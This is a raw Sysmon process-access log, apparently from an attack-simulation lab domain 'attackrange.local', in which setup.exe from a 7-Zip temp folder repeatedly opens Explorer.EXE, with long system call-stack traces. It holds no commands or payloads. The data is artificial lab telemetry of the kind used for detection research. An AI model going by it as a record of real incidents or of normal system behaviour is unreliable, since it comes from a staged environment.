13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d